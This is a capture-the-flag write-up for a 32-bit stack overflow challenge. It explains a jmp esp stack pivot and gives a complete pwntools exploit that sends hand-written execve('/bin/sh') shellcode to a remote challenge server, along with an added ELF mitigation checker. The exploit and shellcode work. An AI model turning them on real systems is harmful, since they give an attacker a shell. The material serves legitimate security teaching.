x_ctf_b0verfl0w
Steps

- Routine inspection: 32-bit program, RELRO is enabled (so the GOT cannot be overwritten)
- Run the program locally to get a feel for what it does
- Load it in 32-bit IDA
fgets can overflow the buffer, but only by 0x32-0x20-0x4 = 14 bytes. Since NX is not enabled, shellcode is the first thing that comes to mind, but the shellcode generated by pwntools will never fit into 0x20 bytes, so it has to be written by hand, and we still need a way to hijack esp so that execution lands on our shellcode.
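An added check, not part of this writeup, that reads the two findings from the routine inspection (NX off, RELRO on) straight from the ELF32 program headers, the same information checksec summarises. It builds constructed header-only sample images so it runs offline, and takes a real binary path as an optional argument.

```python
import struct
import sys

# Program-header types and flag used by the GNU toolchain (values from the ELF ABI).
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1

def elf32_mitigations(data: bytes) -> dict:
    """Report NX and RELRO status of a little-endian ELF32 image from its program headers."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1:                      # EI_CLASS: 1 = ELFCLASS32
        raise ValueError("only ELF32 is handled here")
    e_phoff, = struct.unpack_from("<I", data, 0x1C)               # Elf32_Ehdr.e_phoff
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x2A)  # e_phentsize, e_phnum
    result = {"bits": 32, "nx": False, "relro": False, "gnu_stack_header": False}
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from("<I", data, off)         # Elf32_Phdr.p_type
        p_flags, = struct.unpack_from("<I", data, off + 24)   # Elf32_Phdr.p_flags
        if p_type == PT_GNU_STACK:
            # NX holds only if the stack segment lacks PF_X; checksec-style tools report "no NX" when the header is missing.
            result["gnu_stack_header"] = True
            result["nx"] = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            result["relro"] = True      # GOT/relocation area gets remapped read-only after relocation
    return result

def build_sample_elf32(stack_flags: int, with_relro: bool) -> bytes:
    """Constructed minimal ELF32 image (headers only, no code) used to exercise the checker."""
    phdrs = [(PT_GNU_STACK, stack_flags)]
    if with_relro:
        phdrs.append((PT_GNU_RELRO, 0x4))                 # PF_R
    ehdr = bytearray(52)                                   # sizeof(Elf32_Ehdr)
    ehdr[0:4] = b"\x7fELF"
    ehdr[4], ehdr[5] = 1, 1                                # ELFCLASS32, ELFDATA2LSB
    struct.pack_into("<I", ehdr, 0x1C, 52)                 # program headers follow the ELF header
    struct.pack_into("<HH", ehdr, 0x2A, 32, len(phdrs))    # sizeof(Elf32_Phdr), count
    body = b"".join(struct.pack("<8I", t, 0, 0, 0, 0, 0, f, 4) for t, f in phdrs)
    return bytes(ehdr) + body

if __name__ == "__main__":
    # Pass a real binary path to inspect it; otherwise use the constructed samples.
    if len(sys.argv) > 1:
        print(elf32_mitigations(open(sys.argv[1], "rb").read()))
    else:
        print("rwx stack + relro:", elf32_mitigations(build_sample_elf32(0x7, True)))
        print("rw stack + relro :", elf32_mitigations(build_sample_elf32(0x6, True)))
```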
A jmp esp gadget is found in the hint function, so we can lay out the stack like this:

The return address is overwritten with the address of jmp esp. After ret executes, esp (the old esp+4) points at the bytes that follow the return address, where sub esp, 0x28; jmp esp sits, so the first jmp esp runs that code; sub esp, 0x28 moves esp back down to the start of the shellcode, and the second jmp esp executes the shellcode.
For details on how esp and eip change when ret executes, see this article.
For how the shellcode is written, see my previous article; here I will just post the exploit:
from pwn import *

context.log_level = 'debug'
context.arch = 'i386'          # 32-bit target, so asm() emits x86 code
r = remote('node3.buuoj.cn', 29554)

# 21-byte hand-written execve("/bin//sh") shellcode; the pwntools shellcraft
# output would not fit into the 0x20-byte buffer.
shellcode = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
print(len(shellcode))          # 21

jmp_esp = 0x8048504            # jmp esp gadget in the hint function
sub_esp_jmp = asm('sub esp,0x28; jmp esp')

# buffer (0x20) + saved ebp (4) holding the shellcode plus padding, then the
# return address -> jmp esp, then the stub that moves esp back onto the shellcode
payload = shellcode + (0x20 - len(shellcode) + 4) * b'a' + p32(jmp_esp) + sub_esp_jmp
r.sendline(payload)
r.interactive()